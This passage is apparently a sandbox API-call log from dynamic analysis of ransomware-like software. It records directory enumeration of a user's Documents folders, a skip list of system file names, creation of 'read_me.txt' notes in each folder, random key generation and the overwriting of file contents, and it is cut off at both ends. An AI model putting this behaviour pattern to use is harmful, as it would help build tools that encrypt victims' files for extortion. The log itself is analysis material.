hTemplateFile=0x0) returned 0x8e4 [0074.364] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.364] CloseHandle (hObject=0x8e4) returned 1 [0074.364] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa06f020, ftCreationTime.dwHighDateTime=0x1d4cd31, ftLastAccessTime.dwLowDateTime=0xc436e440, ftLastAccessTime.dwHighDateTime=0x1d4cfbc, ftLastWriteTime.dwLowDateTime=0xc436e440, ftLastWriteTime.dwHighDateTime=0x1d4cfbc, nFileSizeHigh=0x0, nFileSizeLow=0x16779, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Vkn-TLoCONw.odp", cAlternateFileName="VKN-TL~1.ODP")) returned 1 [0074.364] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\Vkn-TLoCONw.odp") returned 92 [0074.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\Vkn-TLoCONw.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\jog4-t9rreaav9\\vkn-tloconw.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e4 [0074.364] StrStrW (lpFirst="vkn-tloconw.odp", lpSrch="read_me.txt") returned 0x0 [0074.364] StrStrW (lpFirst="vkn-tloconw.odp", lpSrch="autoexec.bat") returned 0x0 [0074.365] StrStrW (lpFirst="vkn-tloconw.odp", lpSrch="desktop.ini") returned 0x0 [0074.365] StrStrW (lpFirst="vkn-tloconw.odp", lpSrch="autorun.inf") returned 0x0 [0074.365] StrStrW (lpFirst="vkn-tloconw.odp", lpSrch="ntuser.dat") returned 0x0 [0074.365] StrStrW (lpFirst="vkn-tloconw.odp", lpSrch="iconcache.db") returned 0x0 [0074.365] StrStrW (lpFirst="vkn-tloconw.odp", lpSrch="bootsect.bak") returned 0x0 [0074.365] StrStrW (lpFirst="vkn-tloconw.odp", lpSrch="boot.ini") returned 0x0 [0074.365] StrStrW (lpFirst="vkn-tloconw.odp", lpSrch="ntuser.dat.log") returned 0x0 [0074.365] StrStrW (lpFirst="vkn-tloconw.odp", lpSrch="thumbs.db") returned 0x0 [0074.365] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 91 [0074.365] QueueUserWorkItem (Function=0x404e00, Context=0x8e4, Flags=0x0) returned 1 [0074.365] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa06f020, ftCreationTime.dwHighDateTime=0x1d4cd31, ftLastAccessTime.dwLowDateTime=0xc436e440, ftLastAccessTime.dwHighDateTime=0x1d4cfbc, ftLastWriteTime.dwLowDateTime=0xc436e440, ftLastWriteTime.dwHighDateTime=0x1d4cfbc, nFileSizeHigh=0x0, nFileSizeLow=0x16779, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="vkn-tloconw.odp", cAlternateFileName="VKN-TL~1.ODP")) returned 0 [0074.365] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0074.365] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\read_me.txt") returned 88 [0074.365] GetProcessHeap () returned 0x280000 [0074.365] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8c21078 | out: hHeap=0x280000) returned 1 [0074.365] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 50 [0074.365] GetProcessHeap () returned 0x280000 [0074.365] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a10068 | out: hHeap=0x280000) returned 1 [0074.651] GetProcessHeap () returned 0x280000 [0074.651] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8d030e8 [0074.651] wnsprintfW (in: pszDest=0x8d030e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\*") returned 76 [0074.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23ed53a0, ftCreationTime.dwHighDateTime=0x1d4cd2f, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b27b8 [0074.652] wnsprintfW (in: pszDest=0x8d030e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\.") returned 76 [0074.652] FindNextFileW (in: hFindFile=0x2b27b8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23ed53a0, ftCreationTime.dwHighDateTime=0x1d4cd2f, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0074.652] wnsprintfW (in: pszDest=0x8d030e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\..") returned 77 [0074.652] FindNextFileW (in: hFindFile=0x2b27b8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6af56890, ftCreationTime.dwHighDateTime=0x1d4c623, ftLastAccessTime.dwLowDateTime=0x44a7c470, ftLastAccessTime.dwHighDateTime=0x1d4cfb6, ftLastWriteTime.dwLowDateTime=0x44a7c470, ftLastWriteTime.dwHighDateTime=0x1d4cfb6, nFileSizeHigh=0x0, nFileSizeLow=0xda1, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="a5q P.pptx", cAlternateFileName="A5QP~1.PPT")) returned 1 [0074.652] wnsprintfW (in: pszDest=0x8d030e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\a5q P.pptx") returned 85 [0074.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\a5q P.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\v2irmqb3e3gp\\a5q p.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8fc [0074.652] StrStrW (lpFirst="a5q p.pptx", lpSrch="read_me.txt") returned 0x0 [0074.652] StrStrW (lpFirst="a5q p.pptx", lpSrch="autoexec.bat") returned 0x0 [0074.652] StrStrW (lpFirst="a5q p.pptx", lpSrch="desktop.ini") returned 0x0 [0074.652] StrStrW (lpFirst="a5q p.pptx", lpSrch="autorun.inf") returned 0x0 [0074.652] StrStrW (lpFirst="a5q p.pptx", lpSrch="ntuser.dat") returned 0x0 [0074.652] StrStrW (lpFirst="a5q p.pptx", lpSrch="iconcache.db") returned 0x0 [0074.652] StrStrW (lpFirst="a5q p.pptx", lpSrch="bootsect.bak") returned 0x0 [0074.652] StrStrW (lpFirst="a5q p.pptx", lpSrch="boot.ini") returned 0x0 [0074.652] StrStrW (lpFirst="a5q p.pptx", lpSrch="ntuser.dat.log") returned 0x0 [0074.653] StrStrW (lpFirst="a5q p.pptx", lpSrch="thumbs.db") returned 0x0 [0074.653] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 92 [0074.653] QueueUserWorkItem (Function=0x404e00, Context=0x8fc, Flags=0x0) returned 1 [0074.653] FindNextFileW (in: hFindFile=0x2b27b8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.653] wnsprintfW (in: pszDest=0x8d030e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\read_me.txt") returned 86 [0074.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\v2irmqb3e3gp\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x900 [0074.653] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.653] CloseHandle (hObject=0x900) returned 1 [0074.653] FindNextFileW (in: hFindFile=0x2b27b8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56fb7ea0, ftCreationTime.dwHighDateTime=0x1d4d231, ftLastAccessTime.dwLowDateTime=0x3805d0a0, ftLastAccessTime.dwHighDateTime=0x1d4cd2b, ftLastWriteTime.dwLowDateTime=0x3805d0a0, ftLastWriteTime.dwHighDateTime=0x1d4cd2b, nFileSizeHigh=0x0, nFileSizeLow=0xacf, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="RGu-6_m8t9IH.pptx", cAlternateFileName="RGU-6_~1.PPT")) returned 1 [0074.653] wnsprintfW (in: pszDest=0x8d030e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\RGu-6_m8t9IH.pptx") returned 92 [0074.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\RGu-6_m8t9IH.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\v2irmqb3e3gp\\rgu-6_m8t9ih.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x900 [0074.653] StrStrW (lpFirst="rgu-6_m8t9ih.pptx", lpSrch="read_me.txt") returned 0x0 [0074.653] StrStrW (lpFirst="rgu-6_m8t9ih.pptx", lpSrch="autoexec.bat") returned 0x0 [0074.653] StrStrW (lpFirst="rgu-6_m8t9ih.pptx", lpSrch="desktop.ini") returned 0x0 [0074.653] StrStrW (lpFirst="rgu-6_m8t9ih.pptx", lpSrch="autorun.inf") returned 0x0 [0074.653] StrStrW (lpFirst="rgu-6_m8t9ih.pptx", lpSrch="ntuser.dat") returned 0x0 [0074.653] StrStrW (lpFirst="rgu-6_m8t9ih.pptx", lpSrch="iconcache.db") returned 0x0 [0074.653] StrStrW (lpFirst="rgu-6_m8t9ih.pptx", lpSrch="bootsect.bak") returned 0x0 [0074.653] StrStrW (lpFirst="rgu-6_m8t9ih.pptx", lpSrch="boot.ini") returned 0x0 [0074.654] StrStrW (lpFirst="rgu-6_m8t9ih.pptx", lpSrch="ntuser.dat.log") returned 0x0 [0074.654] StrStrW (lpFirst="rgu-6_m8t9ih.pptx", lpSrch="thumbs.db") returned 0x0 [0074.654] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 93 [0074.654] QueueUserWorkItem (Function=0x404e00, Context=0x900, Flags=0x0) returned 1 [0074.654] FindNextFileW (in: hFindFile=0x2b27b8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb713060, ftCreationTime.dwHighDateTime=0x1d4c7ec, ftLastAccessTime.dwLowDateTime=0x6ab92010, ftLastAccessTime.dwHighDateTime=0x1d4cdbc, ftLastWriteTime.dwLowDateTime=0x6ab92010, ftLastWriteTime.dwHighDateTime=0x1d4cdbc, nFileSizeHigh=0x0, nFileSizeLow=0x739a, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="YZwbq6b.docx", cAlternateFileName="YZWBQ6~1.DOC")) returned 1 [0074.654] wnsprintfW (in: pszDest=0x8d030e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\YZwbq6b.docx") returned 87 [0074.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\YZwbq6b.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\v2irmqb3e3gp\\yzwbq6b.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x904 [0074.654] StrStrW (lpFirst="yzwbq6b.docx", lpSrch="read_me.txt") returned 0x0 [0074.654] StrStrW (lpFirst="yzwbq6b.docx", lpSrch="autoexec.bat") returned 0x0 [0074.654] StrStrW (lpFirst="yzwbq6b.docx", lpSrch="desktop.ini") returned 0x0 [0074.654] StrStrW (lpFirst="yzwbq6b.docx", lpSrch="autorun.inf") returned 0x0 [0074.654] StrStrW (lpFirst="yzwbq6b.docx", lpSrch="ntuser.dat") returned 0x0 [0074.654] StrStrW (lpFirst="yzwbq6b.docx", lpSrch="iconcache.db") returned 0x0 [0074.654] StrStrW (lpFirst="yzwbq6b.docx", lpSrch="bootsect.bak") returned 0x0 [0074.654] StrStrW (lpFirst="yzwbq6b.docx", lpSrch="boot.ini") returned 0x0 [0074.654] StrStrW (lpFirst="yzwbq6b.docx", lpSrch="ntuser.dat.log") returned 0x0 [0074.654] StrStrW (lpFirst="yzwbq6b.docx", lpSrch="thumbs.db") returned 0x0 [0074.654] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 94 [0074.654] QueueUserWorkItem (Function=0x404e00, Context=0x904, Flags=0x0) returned 1 [0074.654] FindNextFileW (in: hFindFile=0x2b27b8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb713060, ftCreationTime.dwHighDateTime=0x1d4c7ec, ftLastAccessTime.dwLowDateTime=0x6ab92010, ftLastAccessTime.dwHighDateTime=0x1d4cdbc, ftLastWriteTime.dwLowDateTime=0x6ab92010, ftLastWriteTime.dwHighDateTime=0x1d4cdbc, nFileSizeHigh=0x0, nFileSizeLow=0x739a, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="yzwbq6b.docx", cAlternateFileName="YZWBQ6~1.DOC")) returned 0 [0074.655] FindClose (in: hFindFile=0x2b27b8 | out: hFindFile=0x2b27b8) returned 1 [0074.655] wnsprintfW (in: pszDest=0x8d030e8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\v2IrmQb3e3gp\\read_me.txt") returned 86 [0074.655] GetProcessHeap () returned 0x280000 [0074.655] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8d030e8 | out: hHeap=0x280000) returned 1 [0074.655] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 51 [0074.655] GetProcessHeap () returned 0x280000 [0074.655] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ba0130 | out: hHeap=0x280000) returned 1 [0074.769] SetFilePointerEx (in: hFile=0x7a8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.769] ReadFile (in: hFile=0x7a8, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.769] SetFilePointerEx (in: hFile=0x7a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.769] GetProcessHeap () returned 0x280000 [0074.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0074.769] GetProcessHeap () returned 0x280000 [0074.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0074.769] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0074.769] GetProcessHeap () returned 0x280000 [0074.769] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0074.769] ReadFile (in: hFile=0x7a8, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x752fd08*=0x49a, lpOverlapped=0x0) returned 1 [0074.784] SetFilePointerEx (in: hFile=0x7a8, liDistanceToMove=0xfffffb66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.784] WriteFile (in: hFile=0x7a8, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x752fd44*=0x49a, lpOverlapped=0x0) returned 1 [0074.784] GetProcessHeap () returned 0x280000 [0074.784] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0074.784] GetProcessHeap () returned 0x280000 [0074.784] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.784] GetProcessHeap () returned 0x280000 [0074.784] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0074.784] GetProcessHeap () returned 0x280000 [0074.784] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.784] GetProcessHeap () returned 0x280000 [0074.784] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0074.784] GetProcessHeap () returned 0x280000 [0074.784] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.784] GetProcessHeap () returned 0x280000 [0074.784] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.784] GetProcessHeap () returned 0x280000 [0074.784] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.784] GetProcessHeap () returned 0x280000 [0074.784] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.784] GetProcessHeap () returned 0x280000 [0074.784] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.785] GetProcessHeap () returned 0x280000 [0074.785] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0074.786] GetProcessHeap () returned 0x280000 [0074.786] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x1f8) returned 0x7dc1440 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.787] GetProcessHeap () returned 0x280000 [0074.787] HeapFree (in: hHeap=0x280000, dwFlags=0x0, 